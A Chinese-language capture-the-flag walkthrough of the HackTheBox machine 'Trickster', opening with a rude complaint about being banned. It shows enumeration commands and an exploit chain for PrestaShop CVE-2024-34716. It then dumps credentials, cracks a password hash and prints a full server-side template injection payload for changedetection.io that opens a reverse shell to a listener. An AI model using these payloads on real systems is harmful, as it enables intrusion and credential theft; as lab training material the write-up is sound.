First of all 你们赢了,不仅突了我的脸,还给我举报 ban 了。但是无所谓,反正我也是打着玩。分不分的都无所谓,我就愿意发 wp。不像某些人当婊子还想立牌坊。
信息搜集 1 2 3 4 5 6 start infoscan10.10 .11.34 :22 open10.10 .11.34 :80 open[*] alive ports len is: 2 start vulscan[*] WebTitle http://10.10 .11.34 code:301 len:306 title:301 Moved Permanently 跳转url: http://trickster.htb
添加 host 之后扫一下。
扫描子域名 1 gobuster vhost -u http://trickster.htb --append-domain -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000 .txt -r
添加 host 给 shop 子域名。
扫描文件目录,这里的-b排除掉 403 状态号。
1 gobuster dir -u http://trickster.htb/ -w /usr/share/wordlists/dirb/common.txt -b 403
git 泄露 shop 子域名也扫到了 git 泄露,githack 直接下载下来,根域名的没有啥东西。
1 2 3 [OK ] admin634ewutrx1jgitlooaj/themes/default/scss/partials/_date-picker .scss [OK ] admin634ewutrx1jgitlooaj/themes/default/scss/partials/_icons.scss [OK ] admin634ewutrx1jgitlooaj/themes/default/scss/partials/_content.scss
发现 admin 路由:admin634ewutrx1jgitlooaj
上来先特,特不进去发现有提示 8.1.5 版本。
GitHub - aelmokhtar/CVE-2024-34716
CVE-2024-34716 – The Deceptive PNG Trap: Breaking Down the PNG-Driven Chain from XSS to Remote Code Execution on PrestaShop (<=8.1.5)
需要利用这个 poc 需要先知道 email 地址,但是在主页 contact-us 里面得到的 admin@trickster.htb 测试之后似乎并不可以,这里卡了一段时间,后来发现在shop.trickster.htb/config路由下的 conig 文件里面有写 user:
因此用户应该是adam@trickster.htb然后打 CVE 里面的 XXS,这里需要稍微修改 github 的项目。打不通,改了一下午也不行。
最后发现莫名其妙的运行就成功了。
可能是需要等待一下,后来发现是 poc 更新了,原来的 poc 咋打不通,然后换个 shell 风格:
1 python3 -c 'import pty;pty.spawn("/bin/bash")'
找半天发现不在 config 里面在 /var/www/prestashop/app/config/parameters.php 里面。
1 2 3 4 5 'database_host' => '127.0.0.1' ,'database_port' => '' ,'database_name' => 'prestashop' ,'database_user' => 'ps_user' ,'database_password' => 'prest@shop_o' ,
登录 mysql。
然后一套小连招找到 password。
1 2 3 4 5 6 7 MariaDB [prestashop]> select * from ps_employee; +-------------+------------+---------+----------+-----------+---------------------+--------------------------------------------------------------+---------------------+-----------------+---------------+--------------------+------------------+----------------------+----------------------+----------+----------+-----------+-------------+----------+---------+--------+-------+---------------+--------------------------+------------------+----------------------+----------------------+-------------------------+----------------------+ | id_employee | id_profile | id_lang | lastname | firstname | email | passwd | last_passwd_gen | stats_date_from | stats_date_to | stats_compare_from | stats_compare_to | stats_compare_option | preselect_date_range | bo_color | bo_theme | bo_css | default_tab | bo_width | bo_menu | active | optin | id_last_order | id_last_customer_message | id_last_customer | last_connection_date | reset_password_token | reset_password_validity | has_enabled_gravatar | +-------------+------------+---------+----------+-----------+---------------------+--------------------------------------------------------------+---------------------+-----------------+---------------+--------------------+------------------+----------------------+----------------------+----------+----------+-----------+-------------+----------+---------+--------+-------+---------------+--------------------------+------------------+----------------------+----------------------+-------------------------+----------------------+ | 1 | 1 | 1 | Store | Trickster | admin@trickster.htb | $2y$10$P8wO3jruKKpvKRgWP6o7o.rojbDoABG9StPUt0dR7LIeK26RdlB/C | 2024-05-25 13:10:20 | 2024-04-25 | 2024-05-25 | 0000-00-00 | 0000-00-00 | 1 | NULL | NULL | default | theme.css | 1 | 0 | 1 | 1 | NULL | 5 | 0 | 0 | 2024-09-27 | NULL | 0000-00-00 00:00:00 | 0 | | 2 | 2 | 0 | james | james | james@trickster.htb | $2a$04$rgBYAsSHUVK3RZKfwbYY9OPJyBbt/OzGw9UHi4UnlK6yG5LyunCmm | 2024-09-09 13:22:42 | NULL | NULL | NULL | NULL | 1 | NULL | NULL | NULL | NULL | 0 | 0 | 1 | 0 | NULL | 0 | 0 | 0 | NULL | NULL | NULL | 0 | +-------------+------------+---------+----------+-----------+---------------------+--------------------------------------------------------------+---------------------+-----------------+---------------+--------------------+------------------+----------------------+----------------------+----------+----------+-----------+-------------+----------+---------+--------+-------+---------------+--------------------------+------------------+----------------------+----------------------+-------------------------+----------------------+
hashcat 魅力时刻:
1 hashcat -m 3200 '$2a$04$rgBYAsSHUVK3RZKfwbYY9OPJyBbt/OzGw9UHi4UnlK6yG5LyunCmm' /usr/share/wordlists/rockyou.txt
1 2 james@trickster.htb pass: alwaysandforever
然后登录 james 的账号。
当 ifconfig 发现当前机器下有 docker 网络,需要先找到开放端口。传个 fscan 扫扫。
扫一下:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 ./fscan -h 172.17.0.1/24 -p 1-65535 ___ _ / _ \ ___ ___ _ __ __ _ ___| | __ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / / /_\\_____\__ \ (__| | | (_| | (__| < \____/ |___/\___|_| \__,_|\___|_|\_\ fscan version: 1.8.4 start infoscan trying RunIcmp2 The current user permissions unable to send icmp packets start ping (icmp) Target 172.17.0.1 is alive (icmp) Target 172.17.0.2 is alive [*] Icmp alive hosts len is: 2 172.17.0.1:22 open 172.17.0.1:80 open 172.17.0.2:5000 open
发现 5000 端口有服务,ssh 拉个 portforward 出来。
1 2 # 建议改个端口方便后面一把嗦 ssh james@10.10.11.34 -L 9292:172.17.0.2:5000
docker GitHub - zcrosman/cve-2024-32651: changedetection rce though ssti
CVE-2024-32651 – Server Side Template Injection (Changedetection.io)
alwaysandforever能登录进去,然后把设置里面的密码登录删掉,然后上面的脚本一把嗦或者照着上面的第二条链接打一下。
1 {% for x in ().__class__.__base__.__subclasses__() % }{% if "warning" in x.__name__ % }{{ x()._module.__builtins__ ['__import__' ]('os').popen("python3 -c 'import os,pty,socket;s=socket.socket();s.connect((\"listen_ip\",listen_port));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(\"/bin/bash\")' ").read() }}{% endif %}{% endfor %}
打完之后有个非预期是从 history 中读取到 root 的密码#YouC4ntCatchMe#
正常好像是一个 prusa 的 cve
盘外招 1 2 3 4 5 6 7 USER FLAG password: alwaysandforever ROOT FLAG password:
